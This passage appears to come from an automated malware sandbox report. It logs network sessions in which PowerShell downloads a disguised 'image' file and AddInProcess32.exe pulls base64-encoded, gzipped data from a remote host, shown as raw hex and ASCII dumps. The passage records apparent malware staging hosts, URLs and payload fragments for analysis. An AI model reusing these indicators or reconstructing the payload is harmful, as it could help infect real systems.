e3 ae 53 53 a5 49 23 08 05 05 e6 c6 03 83 ed 4e Data Ascii: \#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI#N
2024-06-14 13:15:05 UTC	1369	IN	Data Raw: 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8 60 43 fe 06 51 cd 9b Data Ascii: #O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@BH5`CQ
2024-06-14 13:15:05 UTC	1369	IN	Data Raw: db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2 dd 7c 6b 1e d3 78 44 b3 Data Ascii: H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v\|kxD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49708	188.114.97.3	443	7908	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-14 13:15:07 UTC	100	OUT	GET /images/004/798/013/original/new_image.jpg?1718284138 HTTP/1.1 Host: uploaddeimagens.com.br
2024-06-14 13:15:07 UTC	688	IN	HTTP/1.1 200 OK Date: Fri, 14 Jun 2024 13:15:07 GMT Content-Type: image/jpeg Content-Length: 3043973 Connection: close Last-Modified: Thu, 13 Jun 2024 13:08:58 GMT ETag: "666aef6a-2e7285" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 3 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nknBjtjNhiKIHCgbCTEwrahXwDoQi9yOGsZVWkZdz5z728YzVMqPNvNiOTwivPAB3G4L4o5v9p1Kl2fgD8QFyImYwpgUYGQnPOPkBGAMyF%2B3USRMXwfNRpacnUvYmhk7Kw3N67D1SW8a"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 893a96597a812cc8-DFW alt-svc: h3=":443"; ma=86400
2024-06-14 13:15:07 UTC	681	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-06-14 13:15:07 UTC	1369	IN	Data Raw: b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe Data Ascii: ccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4ApC.J9
2024-06-14 13:15:07 UTC	1369	IN	Data Raw: bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab 03 31 53 47 2a 06 Data Ascii: 2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*
2024-06-14 13:15:07 UTC	1369	IN	Data Raw: 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 64 e5 58 1e Data Ascii: qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(hdX
2024-06-14 13:15:07 UTC	1369	IN	Data Raw: af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f Data Ascii: scb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^}E./
2024-06-14 13:15:07 UTC	1369	IN	Data Raw: 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92 76 91 64 0a 35 c0 20 Data Ascii: OKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>imvd5
2024-06-14 13:15:07 UTC	1369	IN	Data Raw: f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90 dd f1 0d 56 a5 f5 Data Ascii: b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},zV
2024-06-14 13:15:07 UTC	1369	IN	Data Raw: 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49 23 08 05 05 e6 c6 03 Data Ascii: MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI#
2024-06-14 13:15:07 UTC	1369	IN	Data Raw: 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8 60 43 fe 06 Data Ascii: nq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@BH5`C
2024-06-14 13:15:07 UTC	1369	IN	Data Raw: 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2 dd 7c 6b 1e d3 Data Ascii: d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v\|k

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49710	188.114.96.3	443	8168	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-14 13:15:16 UTC	125	OUT	GET /API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh HTTP/1.1 Host: whatismyipaddressnow.co Connection: Keep-Alive
2024-06-14 13:15:17 UTC	617	IN	HTTP/1.1 200 OK Date: Fri, 14 Jun 2024 13:15:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pWsdZ6fbK8rDYaT3Jwyz6u9%2BfQJJlDsVkbyi%2Fg%2FsuWR0mQRE7ZeiivCYVHMT7IO%2B%2BevMrTfWubD2AVxT%2FGMde9aAabOpL0aZKM6iLuJSOaHd8BqtlB7HpGZR8rLOyZ5m8WdVpOTfLkbVJw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 893a9696dfa62d33-DFW alt-svc: h3=":443"; ma=86400
2024-06-14 13:15:17 UTC	752	IN	Data Raw: 34 39 37 65 0d 0a 48 34 73 49 41 41 41 41 41 41 41 41 41 38 78 64 42 33 77 55 78 66 66 66 35 43 36 58 35 46 49 76 46 39 4c 68 62 73 48 41 45 5a 42 65 6b 74 42 37 6b 39 35 43 72 36 48 44 41 61 47 48 68 4e 42 52 41 65 6b 67 53 6b 63 51 6b 43 35 46 46 42 57 6c 57 42 41 70 69 71 4b 69 4b 46 5a 51 73 57 42 42 32 6e 2f 65 33 4f 33 75 33 4d 37 75 33 65 37 63 2f 63 4c 66 6a 33 78 7a 4e 37 66 7a 39 73 31 37 62 2f 71 38 4e 32 31 37 4c 75 45 4d 48 4d 63 5a 30 62 2b 48 44 7a 6e 75 4b 4f 66 36 72 79 48 6e 2b 37 38 69 39 43 2f 61 64 69 79 61 65 7a 6e 38 41 2f 35 6f 30 42 4d 66 38 46 32 47 44 63 2b 7a 6a 78 33 76 48 44 70 2b 77 47 6a 37 6f 41 46 6a 78 6a 67 6e 32 41 66 6d 32 73 64 50 48 47 4d 66 50 73 62 65 74 48 31 6e 2b 32 6a 6e 34 4e 78 4b 55 56 48 6d 78 39 77 30 4f Data Ascii: 497eH4sIAAAAAAAAA8xdB3wUxfff5C6X5FIvF9LhbsHAEZBektB7k95Cr6HDAaGHhNBRAekgSkcQkC5FFBWlWBApiqKiKFZQsWBB2n/e3O3u3M7u3e7c/cLfj3xzN7fz9s17b/q8N217LuEMHMcZ0b+HDznuKOf6ryHn+78i9C/adiyaezn8A/5o0BMf8F2GDc+zjx3vHDp+wGj7oAFjxjgn2Afm2sdPHGMfPsbetH1n+2jn4NxKUVHmx9w0O
2024-06-14 13:15:17 UTC	1369	IN	Data Raw: 63 6a 48 59 7a 31 5a 4e 54 39 43 39 39 79 55 36 33 48 71 48 79 56 38 6b 6f 59 45 61 4f 52 77 47 69 30 34 51 49 71 56 75 6b 56 5a 31 74 49 6a 38 56 37 76 6f 55 67 37 31 6e 67 55 73 48 35 4d 55 43 6a 64 4c 43 68 49 4d 5a 56 36 76 78 59 49 53 48 57 6e 57 41 52 45 69 7a 75 68 44 67 68 41 58 2f 6f 46 71 38 6f 61 49 48 2f 30 75 47 62 75 31 44 38 72 2b 4c 76 76 66 5a 48 58 55 49 36 53 35 62 2b 47 6b 55 39 31 63 35 67 44 4d 35 50 51 4f 39 77 4e 41 31 42 30 69 30 4a 61 59 73 4e 77 66 6d 4a 4b 47 6c 38 6d 62 4c 63 57 4b 4d 6a 43 36 55 46 35 79 64 35 50 69 4f 2b 65 31 66 2f 6e 39 4d 70 71 70 50 34 79 72 6e 66 74 6c 61 56 56 62 79 71 52 76 67 4f 75 39 74 50 56 4d 73 33 69 56 39 2f 71 54 64 52 55 45 39 70 7a 43 4c 49 38 59 75 66 64 4e 53 53 48 69 77 73 41 30 4a 45 35 Data Ascii: cjHYz1ZNT9C99yU63HqHyV8koYEaORwGi04QIqVukVZ1tIj8V7voUg71ngUsH5MUCjdLChIMZV6vxYISHWnWAREizuhDghAX/oFq8oaIH/0uGbu1D8r+LvvfZHXUI6S5b+GkU91c5gDM5PQO9wNA1B0i0JaYsNwfmJKGl8mbLcWKMjC6UF5yd5PiO+e1f/n9MpqpP4yrnftlaVVbyqRvgOu9tPVMs3iV9/qTdRUE9pzCLI8YufdNSSHiwsA0JE5
2024-06-14 13:15:17 UTC	1369	IN	Data Raw: 76 65 74 2f 64 4b 35 30 56 65 71 57 7a 37 6f 51 50 68 49 51 50 33 41 6e 6e 68 49 52 7a 37 6f 51 50 68 59 51 50 33 51 6e 6e 68 59 54 7a 37 76 48 32 6e 58 67 30 75 45 59 2f 58 42 42 2b 75 4f 42 2b 38 71 4b 51 63 4e 47 64 63 45 6c 49 77 42 38 4f 42 78 73 63 71 36 48 67 6e 4c 33 2f 44 53 54 2f 6e 49 51 65 7a 6d 6e 77 66 63 4a 4c 61 42 52 45 4a 4b 34 4a 77 6d 4e 65 52 30 38 6f 5a 33 61 77 34 31 6e 30 48 52 48 35 43 49 68 55 43 38 36 48 76 38 36 31 51 62 67 62 63 48 31 35 6a 76 7a 79 50 50 6c 6c 46 55 64 38 57 51 65 2f 31 48 4a 39 4d 54 6a 58 6b 38 39 74 77 43 70 77 2f 32 51 4d 63 61 35 32 76 64 72 39 33 62 6e 52 49 2b 63 6d 32 63 4f 62 34 58 74 7a 39 2f 63 45 77 2b 4c 68 72 70 54 78 51 74 31 6f 74 76 6b 69 55 5a 73 4c 4c 33 76 55 75 4b 45 62 46 34 77 6b 44 4b Data Ascii: vet/dK50VeqWz7oQPhIQP3AnnhIRz7oQPhYQP3QnnhYTz7vH2nXg0uEY/XBB+uOB+8qKQcNGdcElIwB8OBxscq6HgnL3/DST/nIQezmnwfcJLaBREJK4JwmNeR08oZ3aw41n0HRH5CIhUC86Hv861QbgbcH15jvzyPPllFUd8WQe/1HJ9MTjXk89twCpw/2QMca52vdr93bnRI+cm2cOb4Xtz9/cEw+LhrpTxQt1otvkiUZsLL3vUuKEbF4wkDK
2024-06-14 13:15:17 UTC	1369	IN	Data Raw: 75 66 41 61 6e 68 4f 70 77 52 79 46 43 2b 49 6d 45 51 59 50 70 58 47 75 4e 54 36 54 6f 78 53 41 44 63 43 75 51 41 4c 39 59 41 34 4e 68 2b 37 4e 37 4d 34 65 44 67 2f 77 41 4b 55 42 79 67 41 38 42 70 43 75 77 6f 45 44 44 59 68 4d 4a 41 4e 6d 65 4b 59 73 51 44 6b 41 42 30 42 35 67 41 78 4e 44 45 54 41 41 78 55 41 4b 67 49 38 44 6c 41 4a 6f 4c 4a 57 42 69 4c 68 6d 53 6f 41 56 51 47 71 41 56 51 48 71 4b 47 4a 67 53 68 34 6f 43 5a 41 4c 59 44 61 41 4a 6b 41 57 56 6f 5a 69 49 5a 6e 73 67 48 71 41 4e 51 46 71 41 64 51 58 78 4d 44 4d 66 42 41 41 34 43 47 41 49 30 41 47 67 4d 30 30 63 70 41 4c 44 7a 54 46 4b 41 5a 51 48 4f 41 46 67 41 74 56 52 69 77 47 69 31 47 30 4c 6f 35 61 79 48 55 45 47 4e 79 59 6e 4a 65 61 55 67 50 38 65 44 4d 41 6a 6c 62 41 62 51 47 61 41 50 Data Ascii: ufAanhOpwRyFC+ImEQYPpXGuNT6ToxSADcCuQAL9YA4Nh+7N7M4eDg/wAKUBygA8BpCuwoEDDYhMJANmeKYsQDkAB0B5gAxNDETAAxUAKgI8DlAJoLJWBiLhmSoAVQGqAVQHqKGJgSh4oCZALYDaAJkAWVoZiIZnsgHqANQFqAdQXxMDMfBAA4CGAI0AGgM00cpALDzTFKAZQHOAFgAtVRiwGi1G0Lo5ayHUEGNyYnJeaUgP8eDMAjlbAbQGaAP
2024-06-14 13:15:17 UTC	1369	IN	Data Raw: 71 57 46 46 46 4b 49 38 4a 30 6f 47 48 7a 31 48 48 2f 30 67 33 4a 46 75 73 76 31 50 59 65 50 2f 6c 6a 6f 70 59 34 45 61 31 7a 6d 53 56 79 57 4f 4a 47 4a 67 53 34 6d 34 6c 43 61 76 48 35 44 6d 6d 63 4a 49 63 57 7a 68 4a 44 69 55 55 4a 49 38 43 77 4e 70 4d 68 30 42 30 6d 65 30 6f 51 55 73 73 6a 77 6e 53 67 79 5a 73 2f 73 55 65 62 61 55 4f 5a 59 64 35 6c 66 64 72 63 74 35 50 70 43 6a 39 32 44 2b 35 42 36 46 4e 73 58 75 68 6d 51 74 79 39 30 63 30 4b 31 4f 4b 49 41 42 30 6e 74 43 39 31 77 61 57 31 66 78 44 70 33 35 2b 6b 72 78 46 4b 53 63 70 33 54 56 42 47 6f 4b 69 59 79 50 4e 68 62 4e 30 6a 58 56 62 70 71 2b 74 45 76 69 6e 33 41 6c 44 65 37 74 53 4b 55 51 2b 6d 49 31 6f 42 63 52 37 51 57 78 52 4c 6d 53 69 71 68 39 4d 61 75 49 7a 68 6e 45 43 36 4e 79 59 52 70 Data Ascii: qWFFFKI8J0oGHz1HH/0g3JFusv1PYeP/ljopY4Ea1zmSVyWOJGJgS4m4lCavH5DmmcJIcWzhJDiUUJI8CwNpMh0B0me0oQUssjwnSgyZs/sUebaUOZYd5lfdrct5PpCj92D+5B6FNsXuhmQty90c0K1OKIAB0ntC91waW1fxDp35+krxFKScp3TVBGoKiYyPNhbN0jXVbpq+tEvin3AlDe7tSKUQ+mI1oBcR7QWxRLmSiqh9MauIzhnEC6NyYRp
